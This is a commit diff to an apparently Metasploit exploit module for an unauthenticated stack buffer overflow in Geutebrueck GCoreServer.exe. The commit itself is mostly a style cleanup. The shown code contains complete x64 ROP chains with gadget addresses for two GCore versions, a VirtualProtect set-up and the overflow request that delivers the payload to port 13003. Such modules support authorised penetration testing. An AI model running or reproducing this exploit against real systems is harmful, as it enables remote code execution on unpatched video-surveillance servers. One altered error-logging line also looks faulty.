multiple changes as requested by h00die

Author: Maurice Popp

modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb

@@ -14,7 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE',
-      'Description'	=> 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).',
+      'Description'	=> %q{
+        This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).
+      },
       'License' => MSF_LICENSE,
       'Author' =>
       [
@@ -24,14 +26,15 @@ def initialize(info = {})
       'References' =>
       [
         ['EDB','41153'],
+        ['CVE', '2017-11517'],
         ['URL','www.geutebrueck.com']
       ],
       'Platform' => 'win',
       'Targets' =>
       [
         ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }],
-        ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}],
-        ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}]
+        ['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}],
+        ['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64}]
       ],
       'Payload' =>
       {
@@ -42,9 +45,8 @@ def initialize(info = {})
       'DefaultTarget' => 0))
 
       register_options(
-        [
-          Opt::RPORT(13003)
-          ])
+        [Opt::RPORT(13003)]
+      )
         end
 
         def fingerprint
@@ -74,75 +76,75 @@ def check
         end
 
         def ropchain(target)
+          # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
+          stack_align = "\x43" * 16
+
           if target.name.include? '1.3.8.42'
             print_status('Preparing ROP chain for target 1.3.8.42!')
 
             # 0x140cd00a9 | add rsp, 0x10 ; ret
             # This is needed because the next 16 bytes are sometimes messed up.
             overwrite = [0x140cd00a9].pack('Q<')
 
-            # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
-            stack_align = "\x43" * 16
-
             # We have 40 bytes left to align our stack!
             # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
             # and to restore it.
             # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
 
             # 0x1404e5cbf: mov edx, esp ; ret
-            stack_align += [0x1404e5cbf].pack('Q<')
+            stack_align << [0x1404e5cbf].pack('Q<')
 
             # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
             # We pop -XXXXX as \xxxxxxxxx to rax
             # 0x14013db94  pop rax ; ret
-            stack_align += [0x14013db94].pack('Q<')
-            stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
+            stack_align << [0x14013db94].pack('Q<')
+            stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')
 
             # Our value is enough.
             # 0x1407dc547  | add rax,rdx ; ret
-            stack_align += [0x1407dc547].pack('Q<')
+            stack_align << [0x1407dc547].pack('Q<')
 
             # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
             # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret
-            stack_align += [0x140ce9ac0].pack('Q<')
+            stack_align << [0x140ce9ac0].pack('Q<')
 
             # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
             # We want RCX to hold the value for VP Argument "Address of Shellcode"
             # 0x140cc2234 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
             rop = ''
-            rop += [0x140cc2234].pack('Q<')
-            rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
+            rop << [0x140cc2234].pack('Q<')
+            rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
             # 0x1400ae2ae    | POP RDX; RETN
             # 0x...1000      | Value for VP "Size of Memory"
-            rop += [0x1400ae2ae].pack('Q<')
-            rop += [0x0000000000000400].pack('Q<')
+            rop << [0x1400ae2ae].pack('Q<')
+            rop << [0x0000000000000400].pack('Q<')
 
             # 0x14029dc6e:   | POP R8; RET
             # 0x...40        | Value for VP "Execute Permissions"
-            rop += [0x14029dc6e].pack('Q<')
-            rop += [0x0000000000000040].pack('Q<')
+            rop << [0x14029dc6e].pack('Q<')
+            rop << [0x0000000000000040].pack('Q<')
 
             # 0x1400aa030    | POP R9; RET
             # 0x1409AE1A8 is the .data section of gcore
-            rop += [0x1400aa030].pack('Q<')
-            rop += [0x1409AE1A8].pack('Q<')
+            rop << [0x1400aa030].pack('Q<')
+            rop << [0x1409AE1A8].pack('Q<')
 
             # 0x140b5927a: xor rax, rax ; ret
-            rop += [0x140b5927a].pack('Q<')
+            rop << [0x140b5927a].pack('Q<')
 
             # 0x1402ce220 pop rax ; ret
             # 0x140d752b8 | VP Stub IAT Entry
-            rop += [0x1402ce220].pack('Q<')
-            rop += [0x140d752b8].pack('Q<')
+            rop << [0x1402ce220].pack('Q<')
+            rop << [0x140d752b8].pack('Q<')
 
             # 0x1407c6b3b mov rax, qword [rax] ; ret  ;
-            rop += [0x1407c6b3b].pack('Q<')
+            rop << [0x1407c6b3b].pack('Q<')
 
             # 0x140989c41 push rax; ret
-            rop += [0x140989c41].pack('Q<')
+            rop << [0x140989c41].pack('Q<')
 
             # 0x1406d684d jmp rsp
-            rop += [0x1406d684d].pack('Q<')
+            rop << [0x1406d684d].pack('Q<')
 
             [rop, overwrite, stack_align]
 
@@ -153,69 +155,66 @@ def ropchain(target)
             # This is needed because the next 16 bytes are sometimes messed up.
             overwrite = [0x140cd9759].pack('Q<')
 
-            # These bytes "\x43" are sacrificed ; we align the stack to jump over this.
-            stack_align = "\x43" * 16
-
             # We have 40 bytes left to align our stack!
             # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
             # and to restore it.
             # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
 
             # 0x1404f213f: mov edx, esp ; ret
-            stack_align += [0x1404f213f].pack('Q<')
+            stack_align << [0x1404f213f].pack('Q<')
 
             # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
             # We pop -XXXXX as \xxxxxxxxx to rax
             # 0x14000efa8  pop rax ; ret
-            stack_align += [0x14000efa8].pack('Q<')
-            stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
+            stack_align << [0x14000efa8].pack('Q<')
+            stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')
 
             # Our value is enough.
             # 0x140cdfe65  | add rax,rdx ; ret
-            stack_align += [0x140cdfe65].pack('Q<')
+            stack_align << [0x140cdfe65].pack('Q<')
 
             # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
             # 0x140cf3110 | mov rsp, rax ; ..... ; ret
-            stack_align += [0x140cf3110].pack('Q<')
+            stack_align << [0x140cf3110].pack('Q<')
 
             # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
             # We want RCX to hold the value for VP Argument "Address of Shellcode"
             # 0x140ccb984 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
             rop = ''
-            rop += [0x140ccb984].pack('Q<')
-            rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
+            rop << [0x140ccb984].pack('Q<')
+            rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
             # 0x14008f7ec      | POP RDX; RETN
             # 0x...1000        | Value for VP "Size of Memory"
-            rop += [0x14008f7ec].pack('Q<')
-            rop += [0x0000000000000400].pack('Q<')
+            rop << [0x14008f7ec].pack('Q<')
+            rop << [0x0000000000000400].pack('Q<')
 
             # 0x140a88f81:   | POP R8; RET
             # 0x...40        | Value for VP "Execute Permissions"
-            rop += [0x140a88f81].pack('Q<')
-            rop += [0x0000000000000040].pack('Q<')
+            rop << [0x140a88f81].pack('Q<')
+            rop << [0x0000000000000040].pack('Q<')
 
             # 0x1400aa030    | POP R9; RET
             # 0x...          | Value for VP "Writeable location". Not sure if needed?
             # 0x140FB5000 is the .data section of gcore; let's test with this writable section...
-            rop += [0x1400aa030].pack('Q<')
-            rop += [0x140FB5000].pack('Q<')
+            rop << [0x1400aa030].pack('Q<')
+            rop << [0x140FB5000].pack('Q<')
 
             # 0x140ccea2f: xor rax, rax ; et
-            rop += [0x140ccea2f].pack('Q<')
+            rop << [0x140ccea2f].pack('Q<')
 
             # 0x14000efa8 pop rax ; ret
             # 0x140d83268 | VP Stub IAT Entry
-            rop += [0x14000efa8].pack('Q<')
-            rop += [0x140d83268].pack('Q<')
+            rop << [0x14000efa8].pack('Q<')
+            rop << [0x140d83268].pack('Q<')
 
             # 0x14095b254 mov rax, qword [rax] ; ret  ;
-            rop += [0x14095b254].pack('Q<')
+            rop << [0x14095b254].pack('Q<')
 
             # 0x140166c46 push rax; ret
-            rop += [0x140166c46].pack('Q<')
+            rop << [0x140166c46].pack('Q<')
 
             # 0x140cfb98d jmp rsp
-            rop += [0x140cfb98d].pack('Q<')
+            rop << [0x140cfb98d].pack('Q<')
 
             [rop, overwrite, stack_align]
 
@@ -239,21 +238,20 @@ def exploit
           begin
             connect
             print_status('Crafting Exploit...')
-            http_req = 'GET /'
-            buffer_200 = "\x41" * 200
-            rop = target_rop
-            payload.encoded
-            buffer_1823 = "\x41" * 1823
-            overwrite = target_overwrite
-            stack_align = target_stack_align
-
-            exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
+            exploit = 'GET /'
+            exploit << "\x41" * 200
+            exploit << target_rop
+            exploit << payload.encoded
+            exploit << "\x41" * 1823
+            exploit << target_overwrite
+            exploit << target_stack_align
+
             print_status('Exploit ready for sending...')
             sock.put(exploit, 'Timeout' => 20)
             print_status('Exploit sent!')
             buf = sock.get_once || ''
           rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-            elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+            elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}")
           ensure
             print_status('Closing socket.')
             disconnect